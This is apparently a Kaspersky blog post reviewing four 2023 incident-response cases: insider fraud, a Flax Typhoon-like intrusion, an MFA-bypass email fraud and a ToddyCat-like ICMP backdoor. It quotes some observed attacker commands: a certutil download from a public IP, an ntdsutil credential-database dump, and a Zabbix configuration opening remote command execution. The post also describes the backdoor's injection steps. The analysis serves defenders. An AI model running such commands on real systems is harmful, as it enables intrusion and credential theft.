A deep dive into the most interesting incident response cases of last year
2024-9-3 19:15:14 Author: securelist.com(查看原文) 阅读量:6 收藏

In 2023, Kaspersky’s Global Emergency Response Team (GERT) participated in services around the world that allowed our experts to gain insight into various threats and techniques used by APT groups, common crimeware and, in some cases, internal adversaries. As we highlighted in our annual report, the most prominent threat in 2023 was ransomware, and the Government vertical was the sector that most frequently requested digital forensics, incident response and malware analysis (DFIRMA) services. While file encryption was the most common threat last year, this post proposes a deep dive into specific cases that caught our attention and were mentioned during our annual DFIRMA report webinar.

The insider fraud attack

A group of collaborators at a government organization identified an internal service that allowed the creation of legitimate transactions that weren’t direct money transfers, but could result in monetary losses for the organization. These losses could reach millions of dollars.

The following scenario (not related to a specific customer) could be considered an example of such misuse of an internal service:

A bank only allows a customer to open a maximum of two bank accounts for free, with the customer paying a fee to open additional accounts. However, the adversary used the internal system to create multiple bank accounts for individual customers, who avoided paying the required fees in exchange for a payment to the adversary. As a result of this incident, the organization reported a loss of more than $20 million.

Many logs related to the application in question, as well as VPN access and network activity, were requested for analysis and the employees involved in the fraudulent activity were identified. Two different cases were analyzed in which the abuse of transaction configuration was confirmed, one by exploiting a vulnerability in a debugging interface and the other by misusing privileges in a valid account.

In the first case, GERT identified a misconfiguration that was abused by the adversaries to steal cookies from other users to impersonate them and their activity. An application on one of the analyzed systems registered exception logging details that included cookies for the user that encountered the exception, allowing us to determine the user involved.

In the other case, one of the users modified the privileges and details of another user, impersonating that user to create additional transactions in the internal service and attempting to hide the original details. Later, this newly modified user accessed the VPN from a previously known system where another user was accessing the transaction system for what was initially catalogued as legitimate activity, but which was recently confirmed to be part of the malicious activity.

Most of the criminal activity was performed by accessing the infrastructure through the VPN, but it was discovered that a new user was accessing the transaction system from the internal network using the same unauthorized behavior.

The results of the GERT team’s analysis confirmed the collusion of a user involved in the transaction requests and managed to identify the sources and link the user activity to various systems involved in the investigation, including local and remote IDs. This information was used by the customer in a timely manner to take legal action against the insider employee and his accomplices.

Mitre ATT&CK techniques

Tactic Technique used Technique ID Details
Initial Access
Persistence
Valid Accounts T1078 The adversaries used legitimate credentials to access the VPN and the internal service
Initial Access External Remote Services T1133 The adversary used the сustomer’s VPN service to gain network access to the internal service
Credential Access Steal Web Session Cookie T1539 The adversary abused a misconfiguration in the transactions service to steal other users’ cookies.
Impact Data Manipulation T1565 After impersonating other users with privileges to create transactions, the adversary started creating unauthorized transactions on their behalf.

Flax Typhoon/SLIME13 APT attack

After enabling Kaspersky Managed Detection and Response (MDR) in a customer’s infrastructure, our platforms detected the presence of well-known software installed on the customer’s premises without their knowledge.

Although these applications were legitimate, attackers used them to gain persistent access to the victim’s environment.

In September 2023, Kaspersky MDR detected a suspicious service on a corporate host. The adversaries used a technique that mimicked the real system application name conhost.exe, but the service was started from a non-standard folder. GERT’s analysis confirmed that the application wasn’t a system service, but was instead associated with SoftEther VPN, a legitimate multi-protocol VPN software.

The supposed conhost application was downloaded to the system by a legitimate local user using the well-known Windows LOLBin certutil, and then installed via command line as a system service:

certutil.exe -urlcache -split -f hxxp://<Public IP>/conhost.exe

Another suspicious service masquerading as wshelper.dll was observed on another host. This DLL was associated with Zabbix agent, which is typically deployed on a monitoring target to actively monitor local resources and applications.

Analysis of the sample confirmed that the configuration file was set to allow remote commands, taking advantage of passive and active checks enabled by Zabbix.

EnableRemoteCommands=1

LogFile=0

Server=0.0.0.0/0

ListenPort=5432

Port 5432 was configured in a firewall rule to allow listening, with the “smart” name PGSQL to make it look legitimate.

GERT’s analysis confirmed that the intrusion lasted more than two years. In the early stages of the attack, an NTDS dump was created using system commands:

cmd /c ntdsutil "ac i ntds" ifm "create full c:\PerfLogs\test"  q  q

c:\windows\sysvol\domain\ntds\active directory\ntds.dit"

During those two years of intrusion, security controls detected and contained multiple attempts to execute pentesting applications such as Mimikatz and CobaltStrike, but all the repurposed legitimate software remained invisible until the customer decided to implement our MDR solution. GERT analysis confirmed that the infrastructure had been compromised since mid-2021. The artifacts and TTPs of the attackers are similar to those used by the Flax Typhoon APT group, which employs minimal malware and custom payloads, but relies heavily on legitimate applications instead.

Mitre ATT&CK techniques

Tactic Technique used Technique ID
Initial Access Exploit Public-Facing Application T1190
Resource Development Develop Capabilities: Malware T1587.001
Credential Access OS Credential Dumping: LSASS Memory T1003.001
Credential Access OS Credential Dumping: Security Account Manager T1003.002
Command And Control Protocol Tunneling T1572
Command And Control Ingress Tool Transfer T1105
Credential Access Brute Force: Password Spraying T1110.003
Execution Exploitation for Client Execution T1203
Lateral Movement Remote Services: Remote Desktop Protocol T1021.001
Lateral Movement Remote Services: SMB/Windows Admin Shares T1021.002
Defense Evasion Masquerading: Match Legitimate Name or Location T1036 .005

The MFA lack of control

After enabling multi-factor authentication (MFA) for its “critical employees”, a financial company was targeted by a spear-phishing attack.

The phishing attack spoofed the popular DocuSign platform and was directed at a specific group of employees. Although the company detected the phishing attack and configured rules to avoid receiving similar emails, some users received and opened the malicious email.

Among those who unwittingly opened the link was one of the protected users. The attackers were able to take control of his account thanks to the implementation of a phishing kit configured to automatically steal the MFA tokens.

The initial phishing attack occurred on October 6, 2023, and GERT analysts confirmed that one of the targeted users opened the malicious email the same day, which was followed by new connections opened from different locations outside the company’s headquarters. The attackers also configured additional MFA devices to access the target user’s mailbox contents without being noticed and without tampering with the original mailbox.

The attackers accessed the contents of the mailbox for a few days, allowing them to understand internal processes and prepare a BEC attack.

One month after the initial access, the attackers compromised a privileged email account (where MFA was not enabled). This new account had privileges in Microsoft 365, which allowed new rules and parameters to be configured. The attackers configured “send as” privileges on behalf of critical users, such as money transfer approvers and requesters. The adversaries also used this account to configure forwarding rules to hide messages received from a specific bank and from specific users.

Once the necessary privileges and rules were configured, the attackers sent a new email request using a legitimate template previously used in the company to request money transfers and attached documents collected from the original compromised account, but with a different destination bank account, requesting an international transfer of more than $300,000.

Upon receiving the request, the bank processed the transfer as usual based on the legitimate source and attached documents.

A notification was sent to the customer from an email address belonging to the bank, confirming the transfer. However, this email address wasn’t listed in the attackers’ forwarding rules, so the message was delivered to the customer’s mailbox. After receiving this message, the customer decided to investigate the user responsible for the privileged mail account.

GERT’s analysis confirmed the initial attack date and vector, the compromised users, and all the techniques used by the threat actors, and provided a set of recommendations for protecting and monitoring cloud assets. By analyzing user access logs (UAL) and additional cloud logs, as well as firewall logs and the client’s own system logs, GERT was able to provide a complete timeline detailing all the techniques used by the fraudsters.

Mitre ATT&CK techniques

Tactic Technique used Technique ID Details
Initial Access Phishing: Spear phishing Link T1566.002 Targeted attack against customer domain from October 6, 2023
Persistence Account Manipulation: Device Registration T1098.005 Multiple authentication methods enabled for a compromised user
Credential Access Brute Force: Password Guessing T1110.001 Failed access on behalf of multiple users
Credential Access Brute Force: Password Spraying T1110.003 Tests for attempted access using credentials confirmed as stolen by Malware Stealers
Privilege Escalation Account Manipulation: Additional Email Delegate Permissions T1098.002 New permission configured to avoid detection and to access different mailboxes
Persistence Email Collection: Email Forwarding Rule T1114.003 New rules configured to evade detection and remain persistent

ToddyCat-like APT attack with an ICMP backdoor

Kaspersky’s Managed and Detection Response service (MDR) was alerted to suspicious activity on domain controllers and Exchange servers.

GERT was contacted to investigate the case; our analysis confirmed SMB abuse and IKEEXT service exploitation, as well as exploitation of the Microsoft Exchange server remote code execution vulnerability (CVE-2021-26855).

One interesting finding was the use of IKEEXT for persistence. The vulnerability used by the attackers, along with the exploit for it, was first published by High-Tech Bridge Security Research Lab in 2012. It was associated with the wlbsctrl.dll library and originally used for privilege escalation. Shortly after the exploit was published, Microsoft patched the vulnerability. However, our analysts confirmed that the same library is now being used as a persistence mechanism for malware.

IKEEXT is a default service on Windows. It is invoked by the svchost process, which loads ikeext.dll, the DLL responsible for the IKEEXT service.

The ikeext.dll library, in turn, is responsible for loading a DLL named wlbsctrl.dll, which is default Windows behavior. However, while the svchost service always runs on the system, wlbsctrl.dll does not exist in the file system by default, and this where threat actors saw an opportunity.

The threat actors created a malicious version of wlbsctrl.dll and saved it on the system. Based on Windows behavior, this DLL was executed every time without requiring registration in Autorun, which is commonly used for persistence.

Besides persistence, in the investigated incident the threat actor used the IKEEXT vulnerability to perform lateral movement via the SMB protocol and created a custom firewall rule named DLL Surrogate that permits dllhost.exe to listen on custom port 52415. All this was achieved by placing the backdoored wlbsctrl.dll into the system32 folder where the legitimate library is normally stored (if present on the system).

Later, the attacker implemented an ICMP backdoor. Once the backdoor was identified, Kaspersky verified and detected two more in-the-wild samples outside the customer’s infrastructure. All the discovered samples were similar except for the following points:

  • Some differences in the PE header (normal behavior between similar samples);
  • Different mutex strings, all located at the same raw file offset;
  • Different bytes at the raw file offset 0x452–0x483, which are apparently useless (non-actionable) code.

Based on GERT’s analysis, the backdoor acted like a loader, configured to execute the following activities:

  • Check for the mutex; if it already exists in memory, terminate the process.
  • Attempt to read the file %WINDIR%\Microsoft.NET\Framework\sbs_clrhost.res; decrypt its contents using the AES algorithm with a hardcoded KEY and a KEY derived from the volume serial number (VSN) of the C drive, then use it to set the value of the registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, and then delete the file.
  • Load the contents of the default value of registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, decrypt it again with AES using the same KEY described above, and invoke the payload shellcode.
  • Allocate the shellcode size in a new segment and jump to it.

Note: The calculated REGKEY NAME (Interface {<calculated_for_each_host>}) is based on the VSN of the C drive (without host VSN it is not possible to decrypt correctly).

As part of the analysis, GERT identified a payload stored in the Windows registry and analyzed it, confirming the following behavior in the encrypted payload.

The decrypted payload has the header “CAFEBABE” (hex bytes magic related to Java Class files) followed by the shellcode size and finally the data. This payload executes the following commands:

  1. Decrypt itself (for the third time);
  2. If not running under exe, create a suspended dllhost process with the parameter “/Processid: {02D4B3F1-FD88-11D1-960D-00805FC79235}”, which refers to a COM+ system application service;
  3. Allocate space to the new process;
  4. Write a section of the decrypted payload (starting at offset 0x1A03, and having a size that’s contained in the small header at offset 0x19FF) into the new allocation;
  5. Patch dllhost (in memory only) to ensure execution at the newly allocated space;
  6. Resume the dllhost process.

A new instance of the shellcode starts from step one. It finds that it is actually running under dllhost, decrypts a new section, executes it and listens on port 52415. The final payload injected into dllhost.exe appears to create a raw ICMP socket with no port. No outbound connection is made (although the received payload likely communicates outbound). Data is received from an unknown source in a Base64-encoded ICMP packet, converted to binary, decrypted, and executed via direct execution of data (allocating space using the VirtualAlloc function), copying shellcode to the allocated space, making a direct call to the allocated space.

According to our threat intelligence platforms, this threat has similarities to APT attacks: the attack Tactics, Techniques and Procedures (TTP) used are very similar to the ToddyCat actor, but there’s no solid attribution to this group.

The objective of the threat actor was to gain persistence for monitoring and future impact, but no other objectives were confirmed based on the evidence obtained.

Mitre ATT&CK techniques

Tactic Technique used Technique ID
Resource Development Develop Capabilities: Exploits T1587.004
Resource Development Develop Capabilities: Malware T1587.001
Initial Access Valid Accounts: Domain Accounts T1078.002
Initial Access Valid Accounts: Local Accounts T1078.003
Execution System Services: Service Execution T1569.002
Execution User Execution: Malicious File T1204.002
Persistence Create or Modify System Process: Windows Service T1543.003
Persistence Hijack Execution Flow: DLL Side-Loading T1574.002
Persistence Server Software Component: Web Shell T1505.003
Persistence Valid Accounts: Domain Accounts T1078.002
Defense Evasion Abuse Elevation Control Mechanism: Bypass User Account Control T1548.002
Defense Evasion Direct Volume Access T1006
Defense Evasion Modify Registry T1112
Defense Evasion Impair Defenses: Disable or Modify System Firewall T1562.004
Defense Evasion Impair Defenses: Disable Windows Event Logging T1562.002
Defense Evasion Indicator Removal: Clear Windows Event Logs T1070.001
Defense Evasion Indicator Removal: File Deletion T1070.004
Defense Evasion Impair Defenses: Impair Command History Logging T1562.003
Command And Control Non-Application Layer Protocol T1095

Conclusions

Although statistics show the government sector was the most targeted vertical last year, it is clear that threat and crimeware actors do not care which vertical their potential targets belong to. To stay ahead of the attackers, the best course of action is to assess your asset inventory and continue to monitor and protect it.

The trend of cyberattacks and intrusions making use of infrastructure assets or legitimate on-premises applications creates the need to enable additional layers of monitoring based on threat intelligence. The implementation of MDR has been one of the recurring triggers for new investigations thanks to its detection capabilities and the ability of analysts to determine timely courses of action.

To learn more about our Incident Response report, we invite you to view the recording of the webinar “Analyzing last year’s cyber incident cases”.


文章来源: https://securelist.com/incident-response-interesting-cases-2023/113611/
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